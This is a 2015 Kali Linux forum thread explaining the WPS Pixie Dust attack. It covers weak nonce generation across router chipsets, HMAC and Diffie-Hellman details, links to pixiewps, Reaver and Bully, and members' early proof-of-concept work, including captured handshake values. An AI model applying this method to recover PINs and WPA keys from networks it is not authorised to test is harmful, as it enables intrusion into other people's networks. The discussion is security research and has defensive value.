PDA

View Full Version : WPS Pixie Dust Attack (Offline WPS Attack)



Pages : [1] 2 3

soxrok2212
2015-01-28, 20:46
WPS Pixie Dust

Disclaimer: I am not responsible for what you do with these tools or this information. The use of anything on this thread should only be attempted on networks you own or have permission to test. Links at the bottom, I want you to understand everything before you ask questions that can be easily answered :)*

I've been looking into the new WPS security flaw found by Dominique Bongard. All of the information I am providing here is not mine, all credit goes to Bongard and the other wonderful sources listed at the bottom. This thread assumes you have some basic knowledge of the WPS exchange. If not, have a look at the "Complete WPS Specification" link posted at the bottom.

Dominique Bongard discovered that some APs have weak ways of generating nonces (known as E-S1 and E-S2) that are supposed to be secret. If we are able to figure out what these nonces are, we can easily find the WPS PIN of an AP since the AP must give it to us in a hash in order to prove that it also knowns the PIN, and the client is not connecting to a rouge AP. These E-S1 and E-S2 are essentially the "keys to unlock the lock box" containing the WPS pin. You can kind of think of the whole thing as an algebra problem, if we know all but 1 variable in an equation, we just have to solve for x. X in this case is the WPS pin (this is not a perfect example but for beginners it should help

Important parts of a WPS exchange: M1, M2, M3, other

Enrollee Nonce
PKE Public Key (Enrollee Public Key)

Registrar Nonce
PKR Public Key (Registrar Public Key)

E-Hash1 = HMAC-SHA-256(authkey) (E-S1 | PSK1 | PKE | PKR)
E-Hash2 = HMAC-SHA-256(authkey) (E-S2 | PSK2 | PKE | PKR)

Authkey [derived from the KDK (Key Derivation Key)]

Components

E-Hash1 is a hash in which we brute force the first half of the PIN.
E-Hash2 is a hash in which we brute force the second half of the PIN.
HMAC is a function that hashes all the data. The function is HMAC-SHA-256.
PSK1 is the first half of the router's PIN (10,000 possibilities)
PSK2 is the second half of the router's PIN (10,000 possibilities)
PKE is the Public Key of the Enrollee (used to verify the legitimacy of a WPS exchange and prevent replays.)
PKR is the Public Key of the Registrar (used to verify the legitimacy of a WPS exchange and prevent replays.)

Vendor Implementations


In Broadcom eCos, these two nonces are generated right after the enrollee nonce (the public nonce generated by the AP.) We also know the function that gives us this data, so if we substitute in seeds, we will eventually find matching nonces, and from there we can find the E-S1 and E-S2 nonces.
> E-S1 + E-S2 are generated from the same PRNG that generates the N1 Enrollee Nonce

In Realtek, the PRNG is a function that uses the time in seconds from January 1st, 1970 until whenever the data in generated (basically when the WPS exchange starts.) The vulnerable part is that the chip uses the same generator to make the Enrollee nonce as it does to make E-S1 and E-S2. :eek: So if the whole entire exchange occurs in that same second, E-S1 = E-S2 = Enrollee Nonce. If it occurs over the course of a few seconds, then all we have to do is find the seed that gave us the Enrolle Nonce, and then increment it and taking the output as E-S1 and E-S2. Its a multivariable brute force, so it may take a little bit more time but not more than a few minutes on a modern PC.
> E-S1 = E-S2 = N1 Enrollee Nonce or generated with seed = time

In Ralink, E-S1 and E-S2 are never generated. They are always 0. Therefore, we just have to brute force the PIN and we're done.
> E-S1 = E-S1 = 0

In MediaTek, the same problem that Ralink has exists. E-S1 and E-S2 are never generated.
> E-S1 = E-S2 = 0

In Celeno, the same problem that Ralink has exists as these chips are just rebranded Ralink chips. E-S1 and E-S2 are never generated.
> E-S1 = E-S2 = 0

Conclusion
Assuming we already know the PKE, PKR, Authkey, E-Hash1 and E-Hash2 since the router gives us these values (and vice versa) and we have figured out E-S1 and E-S2 by brute forcing them or knowing that they are equal to 0, we can run all the data through the hash function and try every pin until we have a matching hash (E-Hash1 and E-Hash2) that the AP gave us. When we are returned with a match, we can say "Ok, that last pin we used matched the hash from the M3 message. That must be the pin." Now we can take the pin we just brute forced and toss it into Reaver or Bully and the AP will say "Ok, you have the right pin, here are all my credentials," including the SSID, WPS Pin, and the WPA key.

Preventing the attack
Look up your device on Wikidevi. (https://wikidevi.com/wiki/Main_Page) If your device contains one of the chipsets as listed above, disable WPS now. If your device does NOT contain one of the chipsets as listed above, disable WPS now.

If you find anything new or wish to correct me, please do and post it in the comments! I will try to respond and keep you updated as frequently as possible!

Resources

1. Slide Presentation (http://archive.hack.lu/2014/Hacklu2014_offline_bruteforce_attack_on_wps.pdf)
2. Video Presentation (http://video.adm.ntnu.no/pres/549931214e18d)
3. Hack Forums (http://www.hackforums.net/showthread.php?tid=4425809&page=1)
4. Diffie-Hellman Key Exchange (https://www.khanacademy.org/computing/computer-science/cryptography/modern-crypt/v/diffie-hellman-key-exchange-part-2)
5. Pseudo Random Number Generators (https://www.khanacademy.org/computing/computer-science/cryptography/crypt/v/random-vs-pseudorandom-number-generators)
6. WPS Background (https://briolidz.wordpress.com/2012/01/10/wi-fi-protected-setup-wps/)
7. Complete WPS Specification (PDF Download) (http://cfile28.uf.tistory.com/attach/16132E3C50FCFFCB3EC74E)
8. Broadcom PRNG Source (https://github.com/RMerl/asuswrt-merlin/blob/master/release/src-rt/bcmcrypto/random.c)
9. Realtek PRNG Source (https://github.com/skristiansson/uClibc-or1k/blob/master/libc/stdlib/random_r.c)
10. Top Hat Sec (http://forum.top-hat-sec.com/index.php?topic=4968.0)
11. First Tweet (https://twitter.com/Reversity/status/490978005859454978)
12. Database with affected/non affected models (https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?usp=sharing)

Tools


Pixiewps 1.4.2: http://www.github.com/wiire-a/pixiewps
Written by wiire
Original Thread: https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool

Reaver 1.6.5: https://github.com/t6x/reaver-wps-fork-t6x
Modified by t6_x, rofl0r and datahead
Original Thread: https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack

Bully 1.1: https://github.com/aanarchyy/bully
Modified by AAnarchYY
Original Thread: https://forums.kali.org/showthread.php?29017-Bully-modified-to-implement-pixiewps-attack

And I would like to give a special thanks to DataHead, Wiire, t6_x, aanarchyy, FrostyHacks and of course Dominique Bongard for all their help! Thank You!

Quest
2015-01-28, 20:57
Thanks soxrok2212 !

Might as well post that in the Howtos.

;)

soxrok2212
2015-01-28, 21:29
Thanks soxrok2212 !

Might as well post that in the Howtos.

;)

Once I have a working solution, I will be sure to!

Quest
2015-01-28, 22:29
cool, but the thing is it might get shut down, as it not a 'Kali Linux General Use'. Moreover it is a howto that just needs some R&D. Just saying.

Keep it up =]

soxrok2212
2015-01-28, 22:38
cool, but the thing is it might get shut down, as it not a 'Kali Linux General Use'. Moreover it is a howto that just needs some R&D. Just saying.

Keep it up =]

I have it posted on hack forums too... getting some replies there.

skycrazy
2015-01-30, 20:40
Is this the code you displayed starting around line 148?
Please delete link if not allowed, thanks.
http://trac.umnaem.webfactional.com/browser/trunk/Hardware/eCos/packages/language/c/libc/stdlib/v3_0/src/rand.cxx?rev=39

skycrazy
2015-01-30, 20:53
Ignore above, i never noticed ooops

soxrok2212
2015-01-31, 02:46
Is this the code you displayed starting around line 148?
Please delete link if not allowed, thanks.
http://trac.umnaem.webfactional.com/browser/trunk/Hardware/eCos/packages/language/c/libc/stdlib/v3_0/src/rand.cxx?rev=39

Yes it is but the code has since changed. Bongard made this presentation back in November 2014 so its a bit different now.

datahead
2015-02-04, 00:26
You are on the right track
I do have a complete and working PoC program that I use. while it says few routers, I've found a lot more are vulnerable than one would think. All through trial and error of testing which router has which chipset, broadcom, ralink, atheros etc. around 12 of the 20 I've tested on, have been vulnerable.

soxrok2212
2015-02-04, 13:46
You are on the right track
I do have a complete and working PoC program that I use. while it says few routers, I've found a lot more are vulnerable than one would think. All through trial and error of testing which router has which chipset, broadcom, ralink, atheros etc. around 12 of the 20 I've tested on, have been vulnerable.

Would you mind sharing? I can give you an email address... Thanks!

Cyb3rg0d
2015-02-04, 22:51
Yea share the knowledge if you know something we do not. Thanks

soxrok2212
2015-02-07, 22:23
I have emailed Bongard I don't think that he's gunna release any tool... Sti waiting for a response from you datahead ;)

soxrok2212
2015-02-23, 11:38
You are on the right track
I do have a complete and working PoC program that I use. while it says few routers, I've found a lot more are vulnerable than one would think. All through trial and error of testing which router has which chipset, broadcom, ralink, atheros etc. around 12 of the 20 I've tested on, have been vulnerable.

OR could you explain how one can go about making their own tool? Such as what modifications we have to make to reaver?

frafri
2015-02-25, 19:35
Hello guys I am new to Kali Linux, reaver , aircrack and such. I was able to audit my Linksys E1000 with Reaver.

But I wanted to know if you guys knew about wpispin . Its a software for windows but it contains a database with WPS pin. I am going to attach some screenshoots
http://postimg.org/image/l7af4yy15/ , http://postimg.org/image/o0se9ux99/

The name of it its WPS-PIN I think the source is www.inforprograma.net , the software is in spanish. It is very interesting

fonzy35
2015-02-27, 03:37
wpspin, yes it help me found some key in a 3 second
the window version is WPSPIN Betis-Jesus
the other one works on Kali
wpspin v1.5

frafri
2015-02-28, 02:15
What do you usually do when the AP limiting error comes.

soxrok2212
2015-02-28, 19:12
What do you usually do when the AP limiting error comes.
Check this out
https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode&highlight=mdk3

repzeroworld
2015-03-02, 02:34
Check this out
https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode&highlight=mdk3

Ahh soxrok2212..this thread brings back memories ;)....when I struggled with bash..my first script....I am still making lengthy roadways in bash and python .thanks to this site====>stackoverflow.com

soxrok2212
2015-03-03, 03:10
New piece of information I am trying to understand. So in the M1 message, we receive a nonce, aka the PKE (DH Key from the enrollee). According to this (http://cfile28.uf.tistory.com/attach/16132E3C50FCFFCB3EC74E) document, the formula for generating these DH Keys is g^AB mod p, aka PKR result^PKE private number mod p. (G is the public number from the registrar, AB is the enrollee's private number used to generate its own public number, and p is the prime modulus. Now, both the enrollee and the registrar each know the shared secret, which I am led to believe is the seed of the PRNG, (I may be wrong here but it all make sense... for now.)

For more information about Diffle-Hellman Keys, (DH Keys), do a quick youtube search for dh key exchange (can't post youtube links).
You can read more about modular arithmetic here. (http://en.wikipedia.org/wiki/Modular_arithmetic)

I'll be looking more into DH Keys and their integration with PRNGs over the next few days/weeks. If you find anything, leave a comment.

repzeroworld
2015-03-03, 05:08
New piece of information I am trying to understand. So in the M1 message, we receive a nonce, aka the PKE (DH Key from the enrollee). According to this (http://cfile28.uf.tistory.com/attach/16132E3C50FCFFCB3EC74E) document, the formula for generating these DH Keys is g^AB mod p, aka PKR result^PKE private number mod p. (G is the public number from the registrar, AB is the enrollee's private number used to generate its own public number, and p is the prime modulus. Now, both the enrollee and the registrar each know the shared secret, which I am led to believe is the seed of the PRNG, (I may be wrong here but it all make sense... for now.)

For more information about Diffle-Hellman Keys, (DH Keys), do a quick youtube search for dh key exchange (can't post youtube links).
You can read more about modular arithmetic here. (http://en.wikipedia.org/wiki/Modular_arithmetic)

I'll be looking more into DH Keys and their integration with PRNGs over the next few days/weeks. If you find anything, leave a comment.

the time taken decrypt the private keys (Private Random number) sent during the Diffie-Helman process depends on the prime modulus used (mod p in our case)...the biggger the prime modulus..the longer it will take, also take into consideration the magntitude of the generator in this case "g"....here is another good link which explains the "Alice and Bob" theory..the mathematics might be a little messed up for some...

http://www.academia.edu/1958665/Euclid_s_and_RSA_Algorithm_For_802.11_Wifi_Securit y_Protocol

GRAPHICAL PATTERNS in Exponential functions that inlcude the modulus of private random prime numbers might be a breakthorugh in the future...

soxrok2212
2015-03-03, 11:29
the time taken decrypt the private keys (Private Random number) sent during the Diffie-Helman process depends on the prime modulus used (mod p in our case)...the biggger the prime modulus..the longer it will take, also take into consideration the magntitude of the generator in this case "g"....here is another good link which explains the "Alice and Bob" theory..the mathematics might be a little messed up for some...

http://www.academia.edu/1958665/Euclid_s_and_RSA_Algorithm_For_802.11_Wifi_Securit y_Protocol

GRAPHICAL PATTERNS in Exponential functions that inlcude the modulus of private random prime numbers might be a breakthorugh in the future...

But since we are the registrar in the WPS transaction, wouldn't we already know the shared secret and the generator and the enrollee's public number and the prime modulus?

repzeroworld
2015-03-03, 22:36
Yes soxrok2212.I caught up focusing on the modulas equation you posted for the Diffie-Helman process...As a result I was commenting on the probability of decrypting Diffie-Helman process using a man in the middle attack......Sticking to this thread Now, i am thinking along codes to bruteforcet Pseudo random Generators in order to compute E-S1 and E-S2 ( I am of the opinion that this might include algorithmic codes that guess statiscal patterns in PRNGs-maths,maths,maths.)..However when this attack was proposed by Mr. Bongard,I was looking for books on PRNGS..I noticed amazon had a couple...I might see if there are torrent ebooks out there....all for now....

soxrok2212
2015-03-03, 23:46
Sticking to this thread Now, i am thinking along codes to bruteforcet Pseudo random Generators in order to compute E-S1 and E-S2 ( I am of the opinion that this might include algorithmic codes that guess statiscal patterns in PRNGs-maths,maths,maths.)

I have sent you an e-mail to one of your old addresses, I'm not sure if you still have access to them... If you could please respond there that would be great, thanks. I have a few questions to ask but don't want to blow up the forums.

soxrok2212
2015-03-04, 03:12
So for those of you having trouble understanding the video of the DH Key exchange I posted, here is how 3^15 mod 17 = 6. First, calculate 3^15, which is our "generator" times the private number of in our applied case, the enrollee... = 14,348,907. Now, we take 14,348,907 and divide it by our prime modulus (known by both the enrollee and registrar, (17) and get 844,053.3529. Now, we remove the remainder from that number, .3529, so we are left with only 844,053 and multiply it by our prime modulus... 844,053 * 17=14,348901. Now, take our initial value (3^15) which is 14,348,907 and subtract the value we just calculated, 14,348,901... 14,348,907 - 14,348,901 = 6!

Therefore:
3^15 mod 17 = 6

Now that the enrollee has generated a public number from its private number, it sends that to the registrar. Now it is the registrars turn to come up with its own private number (13) and make a public number.

3^13 mod 17 = 12

3^13 = 1,594,323
Now, divide by our prime modulus (17)... 1,594,323 / 17 = 93,783.70588. Remove the decimal and get 93,783. Now multiply that number by 17... 93,783 * 17 = 1,594,311. Now, take our initial value and subtract the value we just created to get the registrar's public number... 1,594,323 - 1,594,311 = 12! The registrar then sends this publicly to the enrollee.

Enrolee public number: 6
Enrolee private number: 15
Registrar public number: 12
Registrar private number: 13

Now, the registrar and the enrollee both know each others public numbers, 6 and 12. So what they do now is they take their public number from the other, and raise it to the power of their own private number.

So for the enrollee to calculate the shared secret, it would do 12^15 mod 17 = 10
And for the registrar to calculate the shared secret, it would do 6^13 mod 17 = 10

Now they both know the shared secret, which I THINK may also be the seed that the PRNG uses (as stated before) but I'm not sure yet, or maybe this shared secret in conjunction with something else is the seed.

soxrok2212
2015-03-04, 21:21
Updated with all the latest information!!!! Just need someone who knows C now... :confused:

repzeroworld
2015-03-04, 23:09
Nice explanation of modulus arithematic aspect...sorry dude i don't know C..hope someone with C experience and pentesting can contribute to this thread,,,I noticed in the Pixie Dust attack documentation there is a lack of certainty whether the PNRG state can be bruteforced..if this can be done then we can compute E-S1 and E-S2 and then bruteforce the first half and second half of the pin offline.....I tihnk we need to get Mr. Bongard and lock him down until he successfully complete his thesis (haha...just kidding);)..

soxrok2212
2015-03-09, 20:01
It can be done, we just have to throw in seeds until we get a match. Very simple. The generator will make a long string of numbers/letters and only part of it in the PKE (Enrollee nonce), and then directly after it are the E-S1 and the E-S2

If anyone knows C, please leave a comment. Looking to find someone to build a tool with.

Or if there is anyone who knows python let me know please. I would like to get a project going.

kcdtv
2015-03-10, 20:15
WoW
thank you guys for this excellent theme
@ soxrok2212
i am not a programmer and seeding is a problem with bash which is the only thing i know very few about. I gues it can be done from the sacrtach but i am not sure baout the efficiency of the code, :D
I know to who ask for help, he should be interested in helping you.
If not i can help you to start something in python and we can see how to get support on the way. C is above my mind :)
I send a MP to this person right now and tell you as soon as possible.
thanks for all your sharing and explanations in this theme . See you

soxrok2212
2015-03-10, 21:32
WoW
thank you guys for this excellent theme
@ soxrok2212
i am not a programmer and seeding is a problem with bash which is the only thing i know very few about. I gues it can be done from the sacrtach but i am not sure baout the efficiency of the code, :D
I know to who ask for help, he should be interested in helping you.
If not i can help you to start something in python and we can see how to get support on the way. C is above my mind :)
I send a MP to this person right now and tell you as soon as possible.
thanks for all your sharing and explanations in this theme . See you

my email is *redacted*

kcdtv
2015-03-11, 09:26
Yes, i guess it was me.... my first language is not spanish but i am definitely more fluent in spanish than in english,(i understand everything but my grammar and my syntaxes are horrible) :D
I write you a mail (in spanish)
I didn't receive an answer from my friend yet... But it is still a bit early for him :p
we keep in touch- i write you a mail right now and like this you have mine
cee you there :)

soxrok2212
2015-03-14, 19:51
You are on the right track
I do have a complete and working PoC program that I use. while it says few routers, I've found a lot more are vulnerable than one would think. All through trial and error of testing which router has which chipset, broadcom, ralink, atheros etc. around 12 of the 20 I've tested on, have been vulnerable.

Have you done any testing with realtek at all? I'm trying to add as many possibilities to a tool as possible.

qolund
2015-03-14, 23:35
I am interested in documentation about vendor-specific implementations of PRNGs.
kcdtv : libpcap is quite broken, i had to lose time reading .cap manually and playing with colors.
http://i.imgur.com/WSrcfSP.png

frafri
2015-03-15, 02:19
awesome, keep it up guys. I am hoping to become a tester for the script

wiire
2015-03-16, 09:56
@soxrok2212
First of all, thank you for your time and effort.

I have been looking by myself about all 'this' but there's something I can't seem to undestand just yet.

On the pdf slides (pag. 24) there's written:
- Upon reception of M1 the Registrar generates PKR and N2
- The Registrar can then compute the DHKey: DHKey= SHA-256 (zeropad(g^{AB} mod p, 192))

DHKey is needed in order to get AuthKey which is used as key of the HMAC-SHA-256 (for both E-Hash1 and E-Hash2).

How is the DHKey actually calculated? Could you make an example? How do we know A?

Sorry if I am missing something.

I know a little C, not enough to develop a modified version of reaver but hopefully enough to help testing or making some PoC kinda code.
I also have a capture of a TP-LINK router which is apparently Ralink, so ES1 = ES2 = 0, right?

Thank you again.

soxrok2212
2015-03-16, 20:03
@soxrok2212
First of all, thank you for your time and effort.

I have been looking by myself about all 'this' but there's something I can't seem to undestand just yet.

On the pdf slides (pag. 24) there's written:
- Upon reception of M1 the Registrar generates PKR and N2
- The Registrar can then compute the DHKey: DHKey= SHA-256 (zeropad(g^{AB} mod p, 192))

DHKey is needed in order to get AuthKey which is used as key of the HMAC-SHA-256 (for both E-Hash1 and E-Hash2).

How is the DHKey actually calculated? Could you make an example? How do we know A?

Sorry if I am missing something.

I know a little C, not enough to develop a modified version of reaver but hopefully enough to help testing or making some PoC kinda code.
I also have a capture of a TP-LINK router which is apparently Ralink, so ES1 = ES2 = 0, right?

Thank you again.

The math behind calculating the DH Keys is not important, only the actual PKE, PKR and Public keys are. I will explain though.

So we have the formula g^AB mod p right? In here, both g and p are "variables" (the generator and prime modulus). These two variables are agreed upon by the Registrar (Access Point) and Enrollee (Client) before the WPS transaction starts. However, A and B are different. They are secret numbers known only by the Enrollee and Registrar respectively (PKE knows A, PKR knows B, they don't know each other's secret numbers). Now, both the Enrollee and the Registrar will will run their secret numbers through the generator (PKE > g^A mod p, PKR > g^b mod p).

Now that that each side has generated a new "public" number with their secret number, they exchange and run a new function (in this case we'll call Ca the PKE public number and Cb the PRK public number). The Enrollee runs: g^ACb mod p, and the Registrar runs: g&BCa mod p.

There is a full version of the video on youtube, just google Diffle-Hellman Key Exchange and click the youtube link... its by Art of the Problem. I'd post it but we can't post youtube links. Hopefully that makes sense.

The TP-Link router may be vulnerable, but I can't say for sure. I've never done testing. It is likely that it is but until there is a tool I can't say for sure. You could try looking in the source but you may not find a certain answer there. Good luck!

kcdtv
2015-03-18, 17:10
@ qolund
Hello :)

wiire
2015-03-18, 20:31
@soxrok2212
Thank you for the explaination. I'll be sure to study the subject thoroughly when I'll have a bit more time. I'm a bit busy at them moment :D

Anyway, while we're waiting for someone able to modifiy reaver/bully, I've made a little program.

For now it just tries to bruteforce the PIN going throught all 20'000 combination (it doesn't use the checksum for now), assuming ES1 = ES2 = 0. Just feed it all the things needed:
- PKe
- PKr
- AuthKey
- E-Hash1
- E-Hash2

Tried on a TP-LINK (Ralink) and it just works. :D Bongard was right.

<link removed>

Here's a sample image:
http://i.imgur.com/bmXLjdD.png (http://imgur.com/bmXLjdD)

EDIT: added the image properly. Removed link.

FurqanHanif
2015-03-19, 04:57
So is their any Tool Available for Pixie Dust Attack or Not???

soxrok2212
2015-03-19, 10:39
So is their any Tool Available for Pixie Dust Attack or Not???

As of right now, there is no official tool that is also user friendly.

wiire
2015-03-19, 10:41
Well my tool /works/ assuming that the AP (enrollee) does not generate the 2 random nonces ES1 and ES2. For non wps-technical users this means that'll work only with a few APs (probably Ralink, as described by Bongard).

When I'll undestand, hopefully with the help of someone, how the Broadcom PNRG seed bruteforce works, I'll be sure to add it to the tool (and post it online on GitHub or similar).

I made the tool while waiting for someone else to make an automatic tool such as a modification of reaver or bully.

Anyway, if someone is interested I'll make a post in the HowTos section how to use it. It requires a little modification in the source code of bully/reaver (tried bully for now) but it's easy. It was my yesterday one-day solution. :)

EDIT: fixed some typos.

soxrok2212
2015-03-19, 10:45
@soxrok2212
Thank you for the explaination. I'll be sure to study the subject thoroughly when I'll have a bit more time. I'm a bit busy at them moment :D

Anyway, while we're waiting for someone able to modifiy reaver/bully, I've made a little program.

For now it just tries to bruteforce the PIN going throught all 20'000 combination (it doesn't use the checksum for now), assuming ES1 = ES2 = 0. Just feed it all the things needed:
- PKe
- PKr
- AuthKey
- E-Hash1
- E-Hash2

Tried on a TP-LINK (Ralink) and it just works. :D Bongard was right.

pixiewps (https://dl.dropboxusercontent.com/u/5647826/pixiewps.c)

Here's a sample image:
http://i.imgur.com/bmXLjdD.png (http://imgur.com/bmXLjdD)

EDIT: added the image properly.

Wonderful! Unfortunately I don't have any ralink devices to test :[ but I will certainly test with some broadcom routers which have low entropy after boot. If you could contact me via email (my username@gmail.com) or Skype (click that little symbol under my name) that would be great! I'm working with a few other people and I'm hoping we can use your knowledge and ralink PoC and incorporate it into a complete project. Thanks again wiire!!

kcdtv
2015-03-19, 14:48
WoW

I am so glad to see this screenshot ;)
The first "public" pixie dust attack... "sometimes dreams comes true" :p
Great job wiire .... :cool:

For the cheksum maybe the fastest will be to have a full pin diccionnary and just "grep" (grab) from the file the second half for PSK2 brute force instead of genrating the cheksum live.
I do not want to make you loose your time, i am very bad at maths and with number.
i get the process but i have difficulties to "see concretly the element involved"
I will try and have a look at your code to try to understand but i do not know C

Would you mind to tell me (us) in this example which part of "auth key" is used for genrating the HMAC256 (e-hash) ?
i guess it is the same lenght that is used to create the string for PKE and PKR and that the process is the same... could you confirm that to me?

Could you tel us also which tp-link model is it concretly and the wifi chipset that it uses?
Could you pass me a probe response from your routeur? i would like to start a kind of data base for everybody where we list affceted devices.


Thank you for sharing with us your work and congratulation

romeoandjuliet
2015-03-19, 19:10
Awesome ! I can't wait to see the source and to have this published !!
Hey Kcdtv ! toujours sur la breche hein ? ;)

wiire
2015-03-19, 22:27
Thank you guys.

@soxrok2212
Ok, added on Skype. I'll be busy for the next 4 - 5 days, so I'll "pause myself". Looking forward to work with the 'crew', though. :)

@kcdtv
Yeah, I know what you mean referring to the checksum digit: computing it everytime or having an array of already pre-computed digits. Could be an option.
In any case bruteforcing 11'000 digits or 20'000 doesn't make any difference on modern processors (after the PRNG seed is bruteforced). Also, if the PIN is chosen by the user, then it's most likely that the checksum won't match (odds are 1/10).

I'm not sure about your question on the AuthKey. It is the key used in the HMAC_SHA-256 hash function and it's 32 bytes (256 bits) long (it's not truncated).
To make an example: E-Hash1 = HMAC_SHA-256{AuthKey [32 bytes]}(ES-1 [16 bytes] || PSK1 [16 bytes] || PKE [192 bytes] || PKR [192 bytes]).
PSK1 it the first half of the PIN converted into an array of characters without termination ('\0'), hashed (HMAC_SHA-256) with AuthKey as a key considering the first 16 bytes (half of the hash digest). Just noticed I made the array twice as big...

PKE, PKR, E-Hash1 and E-Hash2 can be all gathered from a wireshark capture. To get AuthKey I have modified the source code of bully. The data is fed to the program as arrays of characters and then parsed and converted into byte arrays.

I'll re-organize the code soon and add some comments. I forgot to release some memory before the program's exit...

I will do more testing later on and send you some data. Just wait a few days... :)

If you have any other question send me a PM with your Skype ID or email or just reply here if not too long... :) I'll contact/reply you.

repzeroworld
2015-03-19, 22:36
@wiire..great attempt!...I did a capture with wireshark and extracted the following details for my target

7d:3f:c7:17:20:ec:52:05:84:69:76:e6:60:9e:aa:0e:8c :e3:ea:a1:ed:36:4f:54:96:c4:86:b2:72:91:86:d6 # E hash 1

55:ca:83:c9:49:05:79:f8:3b:09:57:78:e1:4d:db:bb:21 :ee:f2:72:5a:02:7e:31:5f:02:ee:b3:72:f0:fc:a3 #E-hash 2

cb:b9:a9:6d:eb:35:94:f7:da:c0:55:be:0d:04:5e:ed:52 :7d:f5:a1:c2:83:68:d2:3d:50:5e:83:ee:3c:d4:20:e6:6 c:07:d8:6b:c9:ea:52:ad:59:34:59:ff:9c:23:d2:d5:2a: 5a:74:a6:c5:fe:8b:0b:8e:c6:09:43:be:c5:df:92:93:77 :6f:12:57:85:ef:bb:a0:b6:58:b8:d2:97:7a:6f:70:f4:2 5:35:36:61:d2:c2:ef:be:38:82:a4:1d:3d:cf:03:3c:c5: d3:a6:52:b0:97:12:5b:a9:f3:0f:83:d0:c9:17:0e:97:cf :e5:9e:67:8c:64:55:30:90:47:25:c4:2c:34:11:49:32:a 2:4e:72:15:93:55:b4:64:87:1c:76:63:cd:b9:dd:57:48: c4:a0:74:e4:0b:f7:10:97:4b:11:07:98:ee:98:6c:a5:71 :f3:85:f4:36:dd:cd:35:4c:e3:3d:ef:43:09:f2:52:ef:d 1:db:a6:c1:f9:ae:b5:7f:61 #pkr


3b:4c:d9:d5:17:e6:db:19:bc:b8:da:d7:f8:91:5d:a5:3b :4a:c8:ec:f2:17:a7:11:a4:3a:9b:d5:5e:d9:a2:b8:78:3 1:70:ae:57:be:be:0c:b2:5e:03:5f:34:28:a4:16:47:b4: 36:e7:24:71:69:54:de:0d:aa:f1:56:08:7a:d0:22:47:1f :0a:5e:2d:32:6c:0e:18:16:db:b5:89:cf:39:cb:3d:a1:f 3:05:cc:b3:a3:59:92:45:aa:45:35:1e:d8:8e:05:54:45: 74:b1:dd:8d:64:b7:6d:5e:37:c6:9c:e9:18:3d:e7:af:6b :73:c1:66:c9:ce:1a:3c:b5:f7:f3:65:be:3a:1b:29:8c:4 1:09:16:4c:b9:f1:df:41:66:99:81:91:82:a1:80:bc:7b: 1e:c9:4d:f2:62:ca:c0:50:3a:c5:5f:cd:17:dd:97:cc:b4 :82:06:15:b2:4d:1c:67:7f:fb:06:9a:c5:19:5c:ce:b0:a 2:90:d6:af:0a:a8:bc:08:d6 # pke

These values are from a tp-link router too...the only difficulty i am having is calculating the Authkey..any suggesstions? ( I haven't seen anything tags like authkey in the wps message 2 in wireshark)

soxrok2212
2015-03-20, 00:32
If you have any other question send me a PM with your Skype ID or email or just reply here if not too long... :) I'll contact/reply you.

Hmmm, I didn't get any requests on Skype but I did get one on Google, is that you? I have a couple questions so I'll stay on google hangouts or whatever its called if you come back on today =D

wiire
2015-03-20, 08:50
the only difficulty i am having is calculating the Authkey..any suggesstions? ( I haven't seen anything tags like authkey in the wps message 2 in wireshark)
Read my last post(s).

@soxrok2212
Don't think so but I have no idea how that works so... might be? Now you should see my request on Skype. It'll will be probabily faster via email (see your inbox) since we obey to different time zones. :D

wn722
2015-03-20, 14:31
so for dummies
how did you extract these again?
- PKe
- PKr
- AuthKey
- E-Hash1
- E-Hash2

soxrok2212
2015-03-20, 14:36
PKE, PKR, E-Hash1, and E-Hash2 can be found in wireshark. Authkey is a bit harder, you need to understand KDK. Look here (http://archive.hack.lu/2014/Hacklu2014_offline_bruteforce_attack_on_wps.pdf) and scroll until you see Key Derivation. Its tough to understand however, tool isn't ready for prime time but we will soon have everything be automated.

wn722
2015-03-20, 14:42
I see.
Is it cleat text or you need to push the cap through some utility?
did you challenge the AP with reaver to get the data?

wn722
2015-03-20, 14:53
seems like there's an another project on Pixie Dust.
http://www.crack-wifi.com/forum/topic-11198-pixie-dust-attack-participez-a-la-recherche-avec-vos-echantillons.html#p75984

only it's in French.
any natives?

soxrok2212
2015-03-20, 15:14
Need to modify bully. That French forum is essentially the same thing as we have on here

kcdtv
2015-03-20, 17:13
@kcdtv
Yeah, I know what you mean referring to the checksum digit: computing it everytime or having an array of already pre-computed digits. Could be an option.
In any case bruteforcing 11'000 digits or 20'000 doesn't make any difference on modern processors (after the PRNG seed is bruteforced). Also, if the PIN is chosen by the user, then it's most likely that the checksum won't match (odds are 1/10).

Normally the router should correct the checksum and just admit valide PIN (that respects the rules of the wifi aliance) also a few routers showed to admit non-legitmate PIN (without checksum)
Anyway that's a detail and as you sayed wil not make any difference...
The next big chalenge is to set the brute force of the seed for models with a "more complex" :rolleyes: pattern than ES-1=ES-2=0

I'm not sure about your question on the AuthKey. It is the key used in the HMAC_SHA-256 hash function and it's 32 bytes (256 bits) long (it's not truncated).
To make an example: E-Hash1 = HMAC_SHA-256{AuthKey [32 bytes]}(ES-1 [16 bytes] || PSK1 [16 bytes] || PKE [192 bytes] || PKR [192 bytes]).
my english is so-so and i often difficulties to understand myself in shakspeare's language. People says english is easy but they are wrong, or it is because they don not mind to speak with faults or imprecisly
By the way you exactly answered my questions ;)
Thanks


seems like there's an another project on Pixie Dust.
http://www.crack-wifi.com/forum/topic-11198-pixie-dust-attack-participez-a-la-recherche-avec-vos-echantillons.html#p75984

only it's in French.
any natives?

i am native and i actually moderate this forum with Spawn ("qolund" here, see message #32)
We are working all together, don't wory for this, if we discover something relevant in crack-wifi.com i will post it as soon as poosible here in english.
wiite did half of the job by
1) making the first public attack vs ralink
2) coding the "Ralink" case ES-1=ES-2=NULL
we need to do the second half
1) making the first atack vs broadcom
2) coding the broadcom case where brute force of PRNG is needed
and we are all there basically... Yesterday we made half of the way

I also openedd a thread on a spanish forum to get more colaboration (but we just started it, it is stil not offcialy launch and we are 2 admin with 2 users :o )
abnyway, if something comes out one way or the other it wil be known here inmediatly :)

let's keep on the good work! Cheers to everybody

wiire
2015-03-20, 17:59
Normally the router should correct the checksum and just admit valide PIN (that respects the rules of the wifi aliance) also a few routers showed to admit non-legitmate PIN (without checksum)
Let me quote part the WPS specification document (hope I'm allowed):

